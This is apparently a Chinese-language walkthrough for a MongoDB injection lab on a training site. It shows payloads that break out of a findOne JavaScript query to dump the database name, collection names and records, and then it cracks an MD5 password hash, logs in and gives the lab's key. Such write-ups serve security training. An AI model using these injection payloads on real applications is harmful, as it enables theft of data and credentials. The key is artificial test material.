MongoDB靶场(手工注入)攻略

MongoDB 是⼀个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案

MongoDB 是⼀个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最富,最像关系数据库的。MongoDB 将数据存储为⼀个文档,数据结构由键值(key=>value)对组成

靶场地址:SQL手工注入漏洞测试(MongoDB数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

第一步:

给出的源码...可以看到数据库查询的语句如下..构造回显测试..

复制代码
var data= db.notice.findOne({'id':'$id'});return data;
传⼊的数据是$id。注意到可以通过闭合 "({'" 来构造payload 因为返回的数据是$obj['retval']['title']与$obj['retval']['content'],可以尝试return({title:'1',content:'2'})来构造回显测试
id=1'});return({title:'1',content:'2
第二步:查询数据库库名
获取数据库名称:
复制代码
id=1'});return({title:tojson(db),content:'2
第三步:查询数据库表名
复制代码
id=1'});return({title:tojson(db.getCollectionNames()),content:'2
第四步:查询数据库字段值
复制代码
id=1'});return({title:tojson(db.Authority_confidential.find()[0]),content:'2
复制代码
id=1'});return({title:tojson(db.Authority_confidential.find()[1]),content:'2
第五步:cmd5解密

地址:md5在线解密破解,md5解密加密

第六步:登录后台

KEY:mozhe82a

相关推荐
草海桐21 分钟前
NoSQL 简单讲解
数据库·nosql
聪明的墨菲特i23 分钟前
SQL进阶知识:四、索引优化
数据库·sql·mysql·database·索引·db2
Harbor Lau1 小时前
IDEA连接达梦数据库
数据库
我该如何取个名字4 小时前
Mac mini 安装mysql数据库以及出现的一些问题的解决方案
数据库·mysql·macos
曹弘毅5 小时前
doris/clickhouse常用sql
数据库·sql·clickhouse·doris
菜萝卜子6 小时前
【Redis】redis主从哨兵
数据库·redis·缓存
蒂法就是我6 小时前
MySQL 的锁,表级锁是哪一层的锁?行锁是哪一层的锁?
数据库·mysql
IvanCodes6 小时前
MySQL 锁机制
数据库·sql·mysql·oracle
青春不流名6 小时前
docker-compose之graylog
数据库·mongodb
橘猫云计算机设计7 小时前
springboot-基于Web企业短信息发送系统(源码+lw+部署文档+讲解),源码可白嫖!
java·前端·数据库·spring boot·后端·小程序·毕业设计